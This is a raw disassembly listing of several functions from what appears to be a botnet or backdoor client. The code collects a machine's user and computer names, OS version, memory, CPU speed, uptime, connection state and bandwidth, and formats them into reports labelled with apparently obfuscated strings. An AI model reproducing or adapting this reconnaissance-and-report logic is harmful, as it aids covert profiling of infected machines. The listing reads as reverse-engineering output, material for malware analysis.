var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
xor edi, edi
push 32h
mov esi, offset dword_457FDC
push edi
push esi
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_43718C ; QueryPerformanceFrequency
cmp [ebp+var_C], edi
jl short loc_41BA7D
jg short loc_41BA34
cmp [ebp+var_10], edi
jbe short loc_41BA7D
loc_41BA34: ; CODE XREF: sub_41B9F8+35�j
cmp [ebp+var_4], edi
jl short loc_41BA7D
jg short loc_41BA40
cmp [ebp+var_8], edi
jbe short loc_41BA7D
loc_41BA40: ; CODE XREF: sub_41B9F8+41�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_42B2F0
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx ; double
fstp [esp+2Ch+var_2C]
call sub_42A706
mov eax, [ebp+arg_4]
mov dword ptr [ebp+var_18+4], edi
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fsubp st(1), st
call sub_42A9E0
mov ecx, eax
jmp short loc_41BA96
; ---------------------------------------------------------------------------
loc_41BA7D: ; CODE XREF: sub_41B9F8+33�j
; sub_41B9F8+3A�j ...
mov eax, [ebp+arg_0]
mov edi, 3E8h
xor edx, edx
mov ecx, edi
div ecx
xor edx, edx
mov ecx, eax
mov eax, [ebp+arg_4]
div edi
sub ecx, eax
loc_41BA96: ; CODE XREF: sub_41B9F8+83�j
mov eax, ecx
xor edx, edx
mov ecx, 15180h
mov edi, 0E10h
div ecx
push 3Ch
pop ebx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, eax
mov eax, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
jnz short loc_41BAD6
test ecx, ecx
ja short loc_41BAD6
push edx
push eax
push edi
push offset a0_2d0_2d0_2d ; "%0.2d:%0.2d:%0.2d"
push esi
call sub_429B03
add esp, 14h
jmp short loc_41BAF8
; ---------------------------------------------------------------------------
loc_41BAD6: ; CODE XREF: sub_41B9F8+C5�j
; sub_41B9F8+C9�j
cmp ecx, 1
mov ebx, offset byte_454A54
jz short loc_41BAE5
mov ebx, offset aS_2 ; "s"
loc_41BAE5: ; CODE XREF: sub_41B9F8+E6�j
push edx
push eax
push edi
push ebx
push ecx
push offset aDDayS0_2d0_2d0 ; "%d day%s %0.2d:%0.2d:%0.2d"
push esi
call sub_429B03
add esp, 1Ch
loc_41BAF8: ; CODE XREF: sub_41B9F8+DC�j
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41B9F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BAFF proc near ; CODE XREF: sub_41D6A6+22�p
; sub_41D7D2+25�p ...
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
xor esi, esi
push 32h
push esi
push offset dword_457F70
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [ebp+var_8]
push eax
call dword_43718C ; QueryPerformanceFrequency
cmp [ebp+var_C], esi
jl short loc_41BB71
jg short loc_41BB38
cmp [ebp+var_10], esi
jbe short loc_41BB71
loc_41BB38: ; CODE XREF: sub_41BAFF+32�j
cmp [ebp+var_4], esi
jl short loc_41BB71
jg short loc_41BB44
cmp [ebp+var_8], esi
jbe short loc_41BB71
loc_41BB44: ; CODE XREF: sub_41BAFF+3E�j
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_42B2F0
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
call sub_42A706
pop ecx
pop ecx
call sub_42A9E0
jmp short loc_41BB7D
; ---------------------------------------------------------------------------
loc_41BB71: ; CODE XREF: sub_41BAFF+30�j
; sub_41BAFF+37�j ...
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 3E8h
div ecx
loc_41BB7D: ; CODE XREF: sub_41BAFF+70�j
xor edx, edx
mov ecx, 15180h
div ecx
pop esi
leave
retn
sub_41BAFF endp
; =============== S U B R O U T I N E =======================================
sub_41BB89 proc near ; CODE XREF: sub_40A9FE+1AF5�p
push esi
push 32h
mov esi, offset dword_457FA4
push 0
push esi
call sub_429760
add esp, 0Ch
call sub_41BCED
test eax, eax
jnz short loc_41BBC1
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aSD_1 ; "%s <%d>"
push esi
call sub_429B03
add esp, 10h
jmp short loc_41BC07
; ---------------------------------------------------------------------------
loc_41BBC1: ; CODE XREF: sub_41BB89+1A�j
xor edx, edx
mov ecx, 15180h
div ecx
push ebx
push edi
mov edi, 0E10h
push 3Ch
pop ebx
mov ecx, eax
mov eax, edx
xor edx, edx
div edi
mov edi, eax
mov eax, edx
xor edx, edx
div ebx
cmp ecx, 1
mov edx, offset byte_454A54
jz short loc_41BBF3
mov edx, offset aS_2 ; "s"
loc_41BBF3: ; CODE XREF: sub_41BB89+63�j
push eax
push edi
push edx
push ecx
push offset aDDayS0_2d0_2d ; "%d day%s %0.2d:%0.2d"
push esi
call sub_429B03
add esp, 18h
pop edi
pop ebx
loc_41BC07: ; CODE XREF: sub_41BB89+36�j
mov eax, esi
pop esi
retn
sub_41BB89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BC0B proc near ; CODE XREF: sub_40A9FE+1AE7�p
; sub_41BD1E:loc_41BD2D�p
var_30 = qword ptr -30h
var_1C = qword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
lea eax, [ebp+var_14]
push edi
xor esi, esi
push eax
mov [ebp+var_4], esi
call dword_4370D0 ; QueryPerformanceCounter
lea eax, [ebp+var_C]
push eax
call dword_43718C ; QueryPerformanceFrequency
cmp [ebp+var_10], esi
jl short loc_41BC72
jg short loc_41BC39
cmp [ebp+var_14], esi
jbe short loc_41BC72
loc_41BC39: ; CODE XREF: sub_41BC0B+27�j
cmp [ebp+var_8], esi
jl short loc_41BC72
jg short loc_41BC45
cmp [ebp+var_C], esi
jbe short loc_41BC72
loc_41BC45: ; CODE XREF: sub_41BC0B+33�j
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
call sub_42B2F0
mov dword ptr [ebp+var_1C], eax
mov dword ptr [ebp+var_1C+4], edx
fild [ebp+var_1C]
push ecx
push ecx ; double
fstp [esp+30h+var_30]
call sub_42A706
pop ecx
pop ecx
call sub_42A9E0
jmp short loc_41BC81
; ---------------------------------------------------------------------------
loc_41BC72: ; CODE XREF: sub_41BC0B+25�j
; sub_41BC0B+2C�j ...
call dword_437188 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
loc_41BC81: ; CODE XREF: sub_41BC0B+65�j
cmp dword_457FD8, esi
mov ebx, eax
jnz short loc_41BCCC
lea eax, [ebp+var_4]
mov edi, offset byte_445423
push eax
mov esi, offset dword_445324
push edi
push esi
push dword_445320
call sub_4212CA
add esp, 10h
cmp [ebp+var_4], 0
jz short loc_41BCB3
cmp ebx, eax
jbe short loc_41BCC8
loc_41BCB3: ; CODE XREF: sub_41BC0B+A2�j
push ebx
push edi
push esi
push dword_445320
call sub_4213E8
add esp, 10h
test eax, eax
jnz short loc_41BCE5
loc_41BCC8: ; CODE XREF: sub_41BC0B+A6�j
xor eax, eax
jmp short loc_41BCE8
; ---------------------------------------------------------------------------
loc_41BCCC: ; CODE XREF: sub_41BC0B+7E�j
push ebx
push offset byte_445423
push offset dword_445324
push dword_445320
call sub_4213E8
add esp, 10h
loc_41BCE5: ; CODE XREF: sub_41BC0B+BB�j
xor eax, eax
inc eax
loc_41BCE8: ; CODE XREF: sub_41BC0B+BF�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BC0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCED proc near ; CODE XREF: sub_40A9FE+8A2C�p
; sub_41BB89+13�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push offset byte_445423
push offset dword_445324
push dword_445320
call sub_4212CA
mov ecx, eax
mov eax, [ebp+var_4]
add esp, 10h
neg eax
sbb eax, eax
and eax, ecx
leave
retn
sub_41BCED endp
; =============== S U B R O U T I N E =======================================
sub_41BD1E proc near ; DATA XREF: sub_418FA1+199�o
xor eax, eax
cmp dword_457034, eax
mov dword_457FD8, eax
jnz short loc_41BD44
loc_41BD2D: ; CODE XREF: sub_41BD1E+24�j
call sub_41BC0B
push 0C3500h
mov dword_457FD8, eax
call dword_437190 ; Sleep
jmp short loc_41BD2D
; ---------------------------------------------------------------------------
loc_41BD44: ; CODE XREF: sub_41BD1E+D�j
push eax
call dword_437174 ; ExitThread
sub_41BD1E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BD4B proc near ; CODE XREF: sub_41BE01+34E�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_41BD53: ; CODE XREF: sub_41BD4B+2F�j
; sub_41BD4B+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call dword_437190 ; Sleep
rdtsc
sub eax, esi
push 0
sbb edx, ebx
push edi
push edx
push eax
call sub_42BE50
mov esi, edx
mov ebx, eax
test esi, esi
ja short loc_41BD53
jb short loc_41BD82
cmp ebx, edi
ja short loc_41BD53
loc_41BD82: ; CODE XREF: sub_41BD4B+31�j
push 0
push 64h
push esi
push ebx
call sub_42BDD0
mov ecx, edx
push 64h
xor edx, edx
mov edi, eax
test ecx, ecx
pop eax
ja short loc_41BDF5
jb short loc_41BDA1
cmp edi, 50h
jnb short loc_41BDA6
loc_41BDA1: ; CODE XREF: sub_41BD4B+4F�j
push 4Bh
xor edx, edx
pop eax
loc_41BDA6: ; CODE XREF: sub_41BD4B+54�j
test ecx, ecx
ja short loc_41BDF5
jb short loc_41BDB1
cmp edi, 47h
jnb short loc_41BDB6
loc_41BDB1: ; CODE XREF: sub_41BD4B+5F�j
push 42h
xor edx, edx
pop eax
loc_41BDB6: ; CODE XREF: sub_41BD4B+64�j
test ecx, ecx
ja short loc_41BDF5
jb short loc_41BDC1
cmp edi, 37h
jnb short loc_41BDC6
loc_41BDC1: ; CODE XREF: sub_41BD4B+6F�j
push 32h
xor edx, edx
pop eax
loc_41BDC6: ; CODE XREF: sub_41BD4B+74�j
test ecx, ecx
ja short loc_41BDF5
jb short loc_41BDD1
cmp edi, 26h
jnb short loc_41BDD6
loc_41BDD1: ; CODE XREF: sub_41BD4B+7F�j
push 21h
xor edx, edx
pop eax
loc_41BDD6: ; CODE XREF: sub_41BD4B+84�j
test ecx, ecx
ja short loc_41BDF5
jb short loc_41BDE1
cmp edi, 1Eh
jnb short loc_41BDE6
loc_41BDE1: ; CODE XREF: sub_41BD4B+8F�j
push 19h
xor edx, edx
pop eax
loc_41BDE6: ; CODE XREF: sub_41BD4B+94�j
test ecx, ecx
ja short loc_41BDF5
jb short loc_41BDF1
cmp edi, 0Ah
jnb short loc_41BDF5
loc_41BDF1: ; CODE XREF: sub_41BD4B+9F�j
xor eax, eax
xor edx, edx
loc_41BDF5: ; CODE XREF: sub_41BD4B+4D�j
; sub_41BD4B+5D�j ...
sub eax, edi
pop edi
sbb edx, ecx
add eax, ebx
adc edx, esi
pop esi
pop ebx
retn
sub_41BD4B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE01 proc near ; CODE XREF: sub_40A9FE+295C�p
var_2CC8 = byte ptr -2CC8h
var_5B8 = byte ptr -5B8h
var_4B8 = byte ptr -4B8h
var_3B4 = byte ptr -3B4h
var_2B4 = byte ptr -2B4h
var_228 = byte ptr -228h
var_1E0 = byte ptr -1E0h
var_198 = byte ptr -198h
var_164 = byte ptr -164h
var_130 = byte ptr -130h
var_118 = dword ptr -118h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = byte ptr -0C4h
var_3E = byte ptr -3Eh
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 2CC8h
call sub_429B60
push ebx
push esi
lea eax, [ebp+var_D8]
push edi
mov esi, offset a??? ; "???"
push eax
mov [ebp+var_4], esi
mov [ebp+var_D8], 9Ch
call dword_437050 ; GetVersionExA
push [ebp+var_D0]
push [ebp+var_D4]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429BBE
add esp, 14h
xor ebx, ebx
cmp [ebp+var_D4], 4
jnz short loc_41BEB3
cmp [ebp+var_D0], ebx
jnz short loc_41BE88
cmp [ebp+var_C8], 1
jnz short loc_41BE6F
mov [ebp+var_4], offset a95 ; "95"
loc_41BE6F: ; CODE XREF: sub_41BE01+65�j
cmp [ebp+var_C8], 2
jnz loc_41BF62
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp loc_41BF33
; ---------------------------------------------------------------------------
loc_41BE88: ; CODE XREF: sub_41BE01+5C�j
cmp [ebp+var_D0], 0Ah
jnz short loc_41BE9D
mov [ebp+var_4], offset a98 ; "98"
jmp loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BE9D: ; CODE XREF: sub_41BE01+8E�j
cmp [ebp+var_D0], 5Ah
jnz loc_41BF2A
mov [ebp+var_4], offset aMe_0 ; "ME"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BEB3: ; CODE XREF: sub_41BE01+54�j
cmp [ebp+var_D4], 5
jnz short loc_41BEF1
cmp [ebp+var_D0], ebx
jnz short loc_41BECD
mov [ebp+var_4], offset a2k ; "2K"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BECD: ; CODE XREF: sub_41BE01+C1�j
cmp [ebp+var_D0], 1
jnz short loc_41BEDF
mov [ebp+var_4], offset aXp ; "XP"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BEDF: ; CODE XREF: sub_41BE01+D3�j
cmp [ebp+var_D0], 2
jnz short loc_41BF2A
mov [ebp+var_4], offset a2k3_0 ; "2K3"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BEF1: ; CODE XREF: sub_41BE01+B9�j
cmp [ebp+var_D4], 6
jnz short loc_41BF2A
cmp [ebp+var_D0], ebx
jnz short loc_41BF1A
cmp [ebp+var_3E], 1
jnz short loc_41BF11
mov [ebp+var_4], offset aVista_0 ; "Vista"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BF11: ; CODE XREF: sub_41BE01+105�j
mov [ebp+var_4], offset a2k8 ; "2K8"
jmp short loc_41BF2A
; ---------------------------------------------------------------------------
loc_41BF1A: ; CODE XREF: sub_41BE01+FF�j
cmp [ebp+var_D0], 1
jnz short loc_41BF2A
mov [ebp+var_4], offset a7 ; "7"
loc_41BF2A: ; CODE XREF: sub_41BE01+97�j
; sub_41BE01+A3�j ...
cmp [ebp+var_C8], 2
jnz short loc_41BF62
loc_41BF33: ; CODE XREF: sub_41BE01+82�j
cmp [ebp+var_C4], bl
jz short loc_41BF62
lea eax, [ebp+var_C4]
push eax
lea eax, [ebp+var_2B4]
push [ebp+var_4]
push offset aSS_3 ; "%s (%s)"
push eax
call sub_429B03
lea eax, [ebp+var_2B4]
add esp, 10h
mov [ebp+var_4], eax
loc_41BF62: ; CODE XREF: sub_41BE01+75�j
; sub_41BE01+130�j ...
mov eax, 100h
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_3B4]
push eax
call dword_456DCC ; GetUserNameA
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_5B8]
push eax
call dword_456F90 ; GetComputerNameA
lea eax, [ebp+var_4B8]
push 104h
push eax
call dword_4370F4 ; GetSystemDirectoryA
lea eax, [ebp+var_228]
push 46h
push eax
push offset aDddMmmDdYyyy ; "ddd, MMM dd, yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call dword_4370F0 ; GetDateFormatA
lea eax, [ebp+var_1E0]
push 46h
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call dword_4370EC ; GetTimeFormatA
push 40h
lea eax, [ebp+var_118]
pop esi
push esi
push ebx
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_118]
mov [ebp+var_118], esi
push eax
call dword_4370E8 ; GlobalMemoryStatusEx
mov eax, [ebp+var_110]
mov ecx, [ebp+var_10C]
shrd eax, ecx, 14h
shr ecx, 14h
push ecx
mov esi, offset aD_0 ; "%d"
push eax
push esi
lea eax, [ebp+var_198]
push 32h
push eax
call sub_429BBE
mov eax, [ebp+var_108]
mov ecx, [ebp+var_104]
shrd eax, ecx, 14h
shr ecx, 14h
push ecx
push eax
push esi
lea eax, [ebp+var_164]
push 32h
push eax
call sub_429BBE
mov esi, dword_437098
add esp, 28h
mov [ebp+var_18], ebx
mov [ebp+var_14], ebx
push ebx
push ebx
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
call esi ; dword_437098
add eax, 2
mov [ebp+var_8], eax
push eax
call sub_4297B8
pop ecx
mov edi, eax
push edi
mov [ebp+var_24], edi
push [ebp+var_8]
call esi ; dword_437098
cmp [edi], bl
mov [ebp+var_8], edi
jz short loc_41C0E3
loc_41C080: ; CODE XREF: sub_41BE01+2E0�j
push offset off_447400
push [ebp+var_8]
call dword_437178 ; lstrcmpiA
test eax, eax
jz short loc_41C0CE
push 40000000h
lea eax, [ebp+var_130]
push [ebp+var_8]
push eax
call sub_41B952
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_3C]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_34]
mov edi, [ebp+var_24]
add [ebp+var_18], eax
mov eax, [ebp+var_30]
adc [ebp+var_14], eax
mov eax, [ebp+var_2C]
add [ebp+var_10], eax
mov eax, [ebp+var_28]
adc [ebp+var_C], eax
loc_41C0CE: ; CODE XREF: sub_41BE01+28F�j
mov esi, [ebp+var_8]
push esi
call sub_4293A0
lea eax, [esi+eax+1]
pop ecx
mov [ebp+var_8], eax
cmp [eax], bl
jnz short loc_41C080
loc_41C0E3: ; CODE XREF: sub_41BE01+27D�j
push edi
call sub_4298F2
pop ecx
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_14]
push [ebp+var_18]
push 1
push ebx
call dword_437188 ; GetTickCount
push eax
call sub_41B9F8
add esp, 0Ch
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_228]
push eax
lea eax, [ebp+var_3B4]
push eax
lea eax, [ebp+var_5B8]
push eax
lea eax, [ebp+var_4B8]
push eax
lea eax, [ebp+var_164]
push [ebp+var_CC]
push [ebp+var_D0]
push [ebp+var_D4]
push [ebp+var_4]
push eax
lea eax, [ebp+var_198]
push eax
call sub_41BD4B
push edx
push eax
push offset aWj27_1belx20 ; "wj27.1Belx20"
push offset aSCpuI64umhzRam ; "%s (CPU): %I64uMHz, (RAM): %sMB total, "...
lea eax, [ebp+var_2CC8]
push 2710h
push eax
call sub_429BBE
add esp, 58h
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_2CC8]
pop edi
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_41C190
call sub_41CE4A
jmp short loc_41C195
; ---------------------------------------------------------------------------
loc_41C190: ; CODE XREF: sub_41BE01+386�j
call sub_41CDD4
loc_41C195: ; CODE XREF: sub_41BE01+38D�j
add esp, 0Ch
leave
retn
sub_41BE01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C19A proc near ; CODE XREF: sub_41C238+A6�p
; sub_41C238+AE�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
lea eax, [ebp+var_4]
xor ebx, ebx
push 1
push eax
push ebx
mov [ebp+var_4], ebx
call dword_456EFC ; GetIfTable
cmp eax, 7Ah
jnz short loc_41C1E5
push [ebp+var_4]
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
jz short loc_41C1E5
push [ebp+var_4]
push ebx
push esi
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_4]
push 1
push eax
push esi
call dword_456EFC ; GetIfTable
test eax, eax
jz short loc_41C1E9
loc_41C1E5: ; CODE XREF: sub_41C19A+1C�j
; sub_41C19A+2B�j
xor eax, eax
jmp short loc_41C223
; ---------------------------------------------------------------------------
loc_41C1E9: ; CODE XREF: sub_41C19A+49�j
push edi
mov edi, [esi]
cmp edi, ebx
mov [ebp+var_8], ebx
jbe short loc_41C217
lea eax, [esi+230h]
loc_41C1F9: ; CODE XREF: sub_41C19A+7B�j
mov edx, [eax]
cmp edx, ebx
jbe short loc_41C20A
mov ecx, [eax+18h]
cmp ecx, ebx
jbe short loc_41C20A
cmp edx, ecx
jnz short loc_41C227
loc_41C20A: ; CODE XREF: sub_41C19A+63�j
; sub_41C19A+6A�j
inc [ebp+var_8]
add eax, 35Ch
cmp [ebp+var_8], edi
jb short loc_41C1F9
loc_41C217: ; CODE XREF: sub_41C19A+57�j
xor edi, edi
loc_41C219: ; CODE XREF: sub_41C19A+9C�j
push esi
call sub_4298F2
pop ecx
mov eax, edi
pop edi
loc_41C223: ; CODE XREF: sub_41C19A+4D�j
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41C227: ; CODE XREF: sub_41C19A+6E�j
cmp [ebp+arg_0], ebx
jz short loc_41C231
mov eax, [eax-4]
jmp short loc_41C234
; ---------------------------------------------------------------------------
loc_41C231: ; CODE XREF: sub_41C19A+90�j
mov eax, [eax+14h]
loc_41C234: ; CODE XREF: sub_41C19A+95�j
mov edi, eax
jmp short loc_41C219
sub_41C19A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C238 proc near ; CODE XREF: sub_40A9FE+2A04�p
var_4F14 = byte ptr -4F14h
var_2804 = byte ptr -2804h
var_F4 = byte ptr -0F4h
var_74 = byte ptr -74h
var_40 = byte ptr -40h
var_C = byte ptr -0Ch
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 4F14h
call sub_429B60
push ebx
push esi
mov esi, 80h
xor ebx, ebx
push esi
lea eax, [ebp+var_F4]
push ebx
push eax
call sub_429760
add esp, 0Ch
cmp dword_457050, ebx
jnz short loc_41C2B0
push ebx
lea eax, [ebp+var_F4]
push esi
push eax
lea eax, [ebp+var_4]
push eax
call dword_456DB4 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_41C291
lea eax, [ebp+var_F4]
push offset dword_447640
push eax
call sub_429B03
pop ecx
pop ecx
loc_41C291: ; CODE XREF: sub_41C238+44�j
test [ebp+var_4], 1
lea eax, [ebp+var_C]
jz short loc_41C2A9
push offset dword_447634
loc_41C29F: ; CODE XREF: sub_41C238+76�j
push eax
call sub_429B03
pop ecx
pop ecx
jmp short loc_41C2CF
; ---------------------------------------------------------------------------
loc_41C2A9: ; CODE XREF: sub_41C238+60�j
push offset off_447630
jmp short loc_41C29F
; ---------------------------------------------------------------------------
loc_41C2B0: ; CODE XREF: sub_41C238+2D�j
mov esi, offset off_44762C
lea eax, [ebp+var_C]
push esi
push eax
call sub_429B03
lea eax, [ebp+var_F4]
push esi
push eax
call sub_429B03
add esp, 10h
loc_41C2CF: ; CODE XREF: sub_41C238+6F�j
push edi
xor esi, esi
xor edi, edi
cmp dword_457070, ebx
jnz short loc_41C2EF
push 1
call sub_41C19A
push ebx
mov esi, eax
call sub_41C19A
pop ecx
mov edi, eax
pop ecx
loc_41C2EF: ; CODE XREF: sub_41C238+A2�j
cmp [ebp+arg_C], ebx
push ebx
jz short loc_41C313
shr esi, 14h
push esi
call sub_427E4F
push eax
mov esi, offset aSmb ; "%sMB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429B03
shr edi, 14h
jmp short loc_41C352
; ---------------------------------------------------------------------------
loc_41C313: ; CODE XREF: sub_41C238+BB�j
cmp [ebp+arg_10], ebx
jz short loc_41C336
shr esi, 1Eh
push esi
call sub_427E4F
push eax
mov esi, offset aSgb ; "%sGB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429B03
shr edi, 1Eh
jmp short loc_41C352
; ---------------------------------------------------------------------------
loc_41C336: ; CODE XREF: sub_41C238+DE�j
shr esi, 0Ah
push esi
call sub_427E4F
push eax
mov esi, offset aSkb ; "%sKB"
lea eax, [ebp+var_40]
push esi
push eax
call sub_429B03
shr edi, 0Ah
loc_41C352: ; CODE XREF: sub_41C238+D9�j
; sub_41C238+FC�j
push ebx
push edi
call sub_427E4F
push eax
lea eax, [ebp+var_74]
push esi
push eax
call sub_429B03
add esp, 28h
mov esi, offset dword_457CF8
push esi
call sub_41E4C1
pop ecx
pop edi
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_41C382
mov eax, offset aNo ; "No"
loc_41C382: ; CODE XREF: sub_41C238+143�j
push eax
push offset dword_457C58
push offset dword_457C40
lea eax, [ebp+var_F4]
push esi
push eax
lea eax, [ebp+var_C]
mov esi, 2710h
push eax
push offset aHm1h_049e4o ; "Hm1H.049e4O/"
push offset aSConnectionSSI ; "%s (Connection): %s (%s), (IntIP): %s, "...
lea eax, [ebp+var_2804]
push esi
push eax
call sub_429BBE
lea eax, [ebp+var_74]
push eax
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_4F14]
push offset aBandwidthDownl ; "(Bandwidth): Downloaded: %s, Uploaded: "...
push eax
call sub_429B03
lea eax, [ebp+var_4F14]
push esi
push eax
lea eax, [ebp+var_2804]
push eax
call sub_4299E0
add esp, 44h
cmp [ebp+arg_8], ebx
lea eax, [ebp+var_2804]
pop esi
pop ebx
push eax
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_41C400
call sub_41CE4A
jmp short loc_41C405
; ---------------------------------------------------------------------------
loc_41C400: ; CODE XREF: sub_41C238+1BF�j
call sub_41CDD4
loc_41C405: ; CODE XREF: sub_41C238+1C6�j
add esp, 0Ch
leave
retn
sub_41C238 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418D70
loc_41C40A: ; CODE XREF: sub_418D70+5�j
push esi
mov esi, ecx
and dword ptr [esi+20h], 0
call sub_41C6C4
and byte ptr [esi+4], 0
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
mov byte ptr [esi+5], 1
mov eax, esi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_418D70
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_418D86
loc_41C42A: ; CODE XREF: sub_418D86+5�j
mov eax, [ecx+20h]
test eax, eax
jz short locret_41C437
push eax
call sub_41C5D6
locret_41C437: ; CODE XREF: sub_418D86+36A9�j
retn
; END OF FUNCTION CHUNK FOR sub_418D86
; ---------------------------------------------------------------------------
loc_41C438: ; DATA XREF: sub_420CB6+1C�o
mov eax, [esp+4]
sub esp, 0C4h
push ebx
push ebp
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [esp+10h]
rep movsd
mov edi, dword_437188
mov dword ptr [eax+0BCh], 1
mov esi, 3E8h
loc_41C466: ; CODE XREF: .text:0041C4A7�j
call edi ; dword_437188
xor edx, edx
mov ecx, esi
div ecx
mov ecx, dword_4584AC
xor edx, edx
mov ebp, esi
mov ebx, eax
mov eax, ecx
div ebp
mov ebp, 0A28h
sub ebx, eax
cmp ebx, ebp
ja short loc_41C4A9
mov ecx, [esp+10h]
call sub_41DB58
mov ecx, [esp+10h]
push eax
call sub_41CF25
push 27AC40h
call dword_437190 ; Sleep
jmp short loc_41C466
; ---------------------------------------------------------------------------
loc_41C4A9: ; CODE XREF: .text:0041C487�j
mov eax, ecx
xor edx, edx
mov ecx, esi
push ebp
div ecx
mov ebx, eax
call edi ; dword_437188
xor edx, edx
mov ecx, esi
div ecx
sub eax, ebx
push eax
push ebx
call edi ; dword_437188
xor edx, edx
div esi
push eax
push offset aPingTimeout?DD ; "Ping Timeout? (%d-%d)%d/%d"
push dword ptr [esp+24h]
call sub_41CAB4
add esp, 18h
push 0
call dword_437174 ; ExitThread
pop edi
pop esi
pop ebp
pop ebx
